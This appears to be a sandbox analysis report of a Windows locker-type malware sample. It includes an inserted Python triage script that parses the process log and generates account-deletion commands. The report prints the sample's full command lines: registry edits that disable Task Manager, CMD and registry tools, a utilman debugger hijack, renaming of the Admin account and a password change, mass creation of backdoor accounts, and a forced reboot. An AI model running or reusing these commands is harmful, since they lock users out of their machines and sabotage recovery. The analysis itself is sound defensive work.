| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\system32\shutdown.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe
"C:\Users\Admin\AppData\Local\Temp\b4596116d3cb69f0dc38413f8469e1f81a99d89ded606bd8da3320c55c9ba12f.exe"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd" "
C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d 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 /f
C:\Windows\system32\reg.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /t REG_DWORD /d 0 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Mouse" /v SwapMouseButtons /t REG_SZ /d 1 /f
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v UseDefaultTile /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "NUL" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Windows\System32\Microsoft\Protect\Defender.Update\img000.png" /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayLastUserName /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v HideFastUserSwitching /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DontDisplayUserName /t REG_DWORD /d 3 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System" /v DisableCMD /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t REG_DWORD /d 1 /f
C:\Windows\System32\Wbem\WMIC.exe
wmic useraccount where name='Admin' rename "YOU ARE THE NEXT"
C:\Windows\system32\net.exe
net user "YOU ARE THE NEXT" "im dead"
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user "YOU ARE THE NEXT" "im dead"
C:\Windows\system32\net.exe
net user T3yZrQ Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user T3yZrQ Maxcheto /add
C:\Windows\system32\net.exe
net user 8rJpX1 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 8rJpX1 Maxcheto /add
C:\Windows\system32\net.exe
net user 9MaL2Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 9MaL2Z Maxcheto /add
C:\Windows\system32\net.exe
net user K4$dF27 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user K4$dF27 Maxcheto /add
C:\Windows\system32\net.exe
net user xC78RT Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user xC78RT Maxcheto /add
C:\Windows\system32\net.exe
net user 3nL9$p2x Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 3nL9$p2x Maxcheto /add
C:\Windows\system32\net.exe
net user X7hbQ5Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user X7hbQ5Z Maxcheto /add
C:\Windows\system32\net.exe
net user R2xD1B Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user R2xD1B Maxcheto /add
C:\Windows\system32\net.exe
net user m14T8z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user m14T8z Maxcheto /add
C:\Windows\system32\net.exe
net user L27w8G Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user L27w8G Maxcheto /add
C:\Windows\system32\net.exe
net user P9dR2Y Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user P9dR2Y Maxcheto /add
C:\Windows\system32\net.exe
net user 5QL71t Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 5QL71t Maxcheto /add
C:\Windows\system32\net.exe
net user r8B6V3F Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user r8B6V3F Maxcheto /add
C:\Windows\system32\net.exe
net user 7CXz1b Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 7CXz1b Maxcheto /add
C:\Windows\system32\net.exe
net user n38vJQ Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user n38vJQ Maxcheto /add
C:\Windows\system32\net.exe
net user x6G7P1L Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user x6G7P1L Maxcheto /add
C:\Windows\system32\net.exe
net user M239Wk Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user M239Wk Maxcheto /add
C:\Windows\system32\net.exe
net user 7F2hY4Z Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 7F2hY4Z Maxcheto /add
C:\Windows\system32\net.exe
net user 8QrB1L7 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 8QrB1L7 Maxcheto /add
C:\Windows\system32\net.exe
net user t93V6D Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user t93V6D Maxcheto /add
C:\Windows\system32\net.exe
net user 5tG2Q8J Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user 5tG2Q8J Maxcheto /add
C:\Windows\system32\net.exe
net user x9K1P7L Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user x9K1P7L Maxcheto /add
C:\Windows\system32\net.exe
net user z7R4M3 Maxcheto /add
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user z7R4M3 Maxcheto /add
C:\Windows\system32\shutdown.exe
shutdown /r /f /t 0
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3956855 /state1:0x41c64e6d
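The run of net.exe / net1.exe invocations above is mass local account creation (one `net user <name> Maxcheto /add` per account, every account with the same password, then an immediate forced reboot). The script below is an added triage example, not part of the sandbox report or of the sample: it parses a process listing in the shape shown here (executable path line followed by its command line), collapses the net.exe/net1.exe pairs so each account is counted once, recovers the shared password, flags a creation burst, and emits the matching `net user <name> /delete` cleanup commands. The embedded log is a constructed excerpt of the listing above, and the burst threshold of 5 accounts is an assumed tuning value.

```python
import re

# Constructed excerpt in the same shape as the sandbox process listing:
# an executable path line followed by its command line. Only a few of the
# report's entries are reproduced; the parser runs unchanged on the full list.
SAMPLE_PROCESS_LOG = """\
C:\\Windows\\system32\\net.exe
net user K4$dF27 Maxcheto /add
C:\\Windows\\system32\\net1.exe
C:\\Windows\\system32\\net1 user K4$dF27 Maxcheto /add
C:\\Windows\\system32\\net.exe
net user xC78RT Maxcheto /add
C:\\Windows\\system32\\net1.exe
C:\\Windows\\system32\\net1 user xC78RT Maxcheto /add
C:\\Windows\\system32\\net.exe
net user z7R4M3 Maxcheto /add
C:\\Windows\\system32\\net1.exe
C:\\Windows\\system32\\net1 user z7R4M3 Maxcheto /add
C:\\Windows\\system32\\shutdown.exe
shutdown /r /f /t 0
"""

# "net user <name> [<password>] /add", typed as net, net.exe, net1 or net1.exe,
# with or without a leading drive path. net.exe forwards the same arguments to
# net1.exe, so one account creation appears twice in a process listing.
NET_USER_ADD = re.compile(
    r"^(?:[A-Za-z]:\\\S*\\)?net(1)?(?:\.exe)?\s+user\s+(\S+)(?:\s+(\S+))?\s+/add\b",
    re.IGNORECASE | re.MULTILINE,
)


def extract_account_additions(log):
    """Every hit in listing order as (user, password_or_None, 'net'|'net1')."""
    return [
        (m.group(2), m.group(3), "net1" if m.group(1) else "net")
        for m in NET_USER_ADD.finditer(log)
    ]


def is_forced_reboot(cmdline):
    """True for a shutdown.exe command line that restarts (/r) and forces (/f)."""
    tokens = cmdline.lower().split()
    if not tokens:
        return False
    exe = tokens[0].rsplit("\\", 1)[-1]
    return exe in ("shutdown", "shutdown.exe") and "/r" in tokens and "/f" in tokens


def triage(log, burst_threshold=5):
    """Summarise account creation in a process listing (threshold is an assumed value)."""
    hits = extract_account_additions(log)
    accounts = {}  # first-seen order; net/net1 pairs collapse to one entry
    for user, password, _tool in hits:
        accounts.setdefault(user, password)
    distinct = set(accounts.values())
    shared_password = distinct.pop() if len(accounts) > 1 and len(distinct) == 1 else None
    return {
        "raw_hits": len(hits),
        "accounts": accounts,
        "shared_password": shared_password,
        "burst": len(accounts) >= burst_threshold,
        "forced_reboot": any(is_forced_reboot(line) for line in log.splitlines()),
        # cmd.exe does not interpret $ inside double quotes, so names like K4$dF27 are safe
        "remediation": [f'net user "{user}" /delete' for user in accounts],
    }


if __name__ == "__main__":
    result = triage(SAMPLE_PROCESS_LOG, burst_threshold=3)
    print(f"{result['raw_hits']} net/net1 hits -> {len(result['accounts'])} accounts")
    print("shared password:", result["shared_password"])
    print("burst:", result["burst"], "| forced reboot:", result["forced_reboot"])
    for cmd in result["remediation"]:
        print(cmd)
```

The remediation list is a starting point for an incident responder, not something to run blindly: confirm the names are not legitimate accounts first, and remember that deleting the accounts does nothing about the reboot-triggered persistence the rest of the report describes, which has to be removed separately.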
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.27.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
Files
C:\Windows\System32\Microsoft\Protect\Defender.Update\main.vbs
| MD5 | 7c652236d1e09a76cfc27cb2611b80ad |
| SHA1 | f9c359054835b06308165e110cdc5229d4fda8fb |
| SHA256 | 4026d4567c422a1281580654d5592d5ce00fce125d8565b7c00ac5f7eb712e4c |
| SHA512 | 6a283c0428b91fbc39efbea2c3a793d89de1ae46451acf2c376c8b9b64c946ffa9ec9d83cc154d1647949e2cad79b2de2e3d655286d94ab52089734a92f943fe |
C:\Windows\System32\Microsoft\Protect\Defender.Update\main.cmd
| MD5 | 7835d8ae389b8b78ea4d06c024d63849 |
| SHA1 | 5a0196e67a8af7185b372aacf5ad817a26546ad1 |
| SHA256 | 029a47eb246a5d4aa21b9a4ccaffc5103c5d93cd8955869d62d04e4f75612fd1 |
| SHA512 | 3b5c9ef7a6ec79983475b78e52b0e2c5d059cbcfd6b40832ddad067ed3fbf648507836664d489553372da6bfecc2c697b51b3ec57e5aa4d2939707bfc90c9372 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-32.png
| MD5 | 4947724257526b4226e21ae7541822cd |
| SHA1 | af4db735de48a5069e70758bdfdf41a8214aa346 |
| SHA256 | 19fbde1e1c5489c3cabc0dcd408f43b789a2e2f89af03a1d4466e55ab1a1faba |
| SHA512 | 52986bdd6a21ae6c5c375a8142bb7cd758d537923e8427f0d6fce0763299306a720163246bd2808a1566c3422caefaa28d3d046f2a466baba3305c51d7ff8902 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-40.png
| MD5 | 2f368b76ab153329fb42db70493474b1 |
| SHA1 | 4c4752399ee2678f6cf4d67affca9dcba59d0023 |
| SHA256 | ae8f3768cf4e3af37ad6efedff11f7f2aa6af91239c175a04c1c366b56b8c35f |
| SHA512 | adccaad355c71376490d5d21d788b3921db7c08291c8ef4066ced9c8cf99d188307da49f53fa987ecddd88f9c2b6c191969ad2d34b016aadefac5afd88dc4c6a |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-48.png
| MD5 | 9ef9685c5a578bfdceccaedb0d5fa519 |
| SHA1 | 713f8621414772eee6602f9fa9ee0a3528d62057 |
| SHA256 | 6c118f5c5e4cf755ec5da06033a29faf53911c522f5aa3de2da2ae8944a87746 |
| SHA512 | 2238ee61a60358f5dfb003fbc69099cea7f62ad88f57c4629f022792d6257fef6928df5e613df152258475d1d49aaad6ae24119d1a67a86e0cdf96aafabbddfb |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user-192.png
| MD5 | f346c440007285aff13e1e0512608862 |
| SHA1 | 4b4a44bc30d37c66dea948bd406effc2bcc63775 |
| SHA256 | 2f2c6c5d8f57b0816cbf1d8db47d0735951f1d1cbf8d562046677391bac23901 |
| SHA512 | 34fd2d6734f3825496d3f8d36057832c39052a0cda05efdc44e2d94f45f8b710da790fda4882bfa1eeb3a9971c5207a6a5a567ec4949cd47fd8efbe95f35f032 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user.png
| MD5 | 1db691b8c60c5f82f3dae2df999c1c7c |
| SHA1 | c252d4a6e065ab5b122f0ae43f6abdbaad49d80e |
| SHA256 | f2669088bebce7d2624993500bc63677dc1a96a1d733c1df88feff17954b201d |
| SHA512 | 3629aaf9e5c40f86c8bdcbfd462a80af19cb883ab2e4b3e3b62f661bedd7c40f4254ae9f274cbd96f3cac2d156cc3a1e5bb3b649bb0df99ecbd93a8ca65330c7 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\guest.png
| MD5 | 908587d867cd053293e2106d70cf42f3 |
| SHA1 | 83ffc3fc7f61d972b41347ff783a29b41bf13087 |
| SHA256 | f622a9159e4b2e792ac772bfc2cfc0ea6c890bad7f7273c916418ce3d425e444 |
| SHA512 | 541b65da137ed37139146ce27aaaee58dac29892c43b39eb0a0a793ed2d868ca8e24bfe836b133e8941ac72ba8a3e1f6a80e04d30b6dea87846cf86129fda5e8 |
C:\Windows\System32\Microsoft\Protect\Defender.Update\user.bmp
| MD5 | 40e2162dfc51fded60ea7b1de3acf588 |
| SHA1 | 3c0b932a845027db10e67c47c0c9cd45fa80ecbb |
| SHA256 | d0d3a8fd4d52042486c2ff093ca64e99fa54b256a7c551f20a6c3f53f569fbf7 |
| SHA512 | 453aea922c4801dc7f7defae4be326158abef053a61518f3a7e1d32118130f8f1dc18945c783e20c5b52e4d698613c7ff715ec17e01b5166acc5f380a156047a |
\??\PIPE\lsarpc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Windows\System32\Microsoft\Protect\Defender.Update\YA.NO.LO.PUEDES.RECUPERAR.txt
| MD5 | e3a317c88b65b975be8e1c21e149f16d |
| SHA1 | 6e7a24a1146ba2800bf0c56ef5b17ea32b01f019 |
| SHA256 | b21c998e4c7258fd24a27f0be4d0ddbdcf95a9f2d7b4f041727e241578a410c0 |
| SHA512 | 1d1228f0f297867b6b134ff8fe5cd493929103098a07beb0edbd63957423dc8536092482d7a061072398bf26e8a5e6a5b3e6fc67439d934671433f4b01208044 |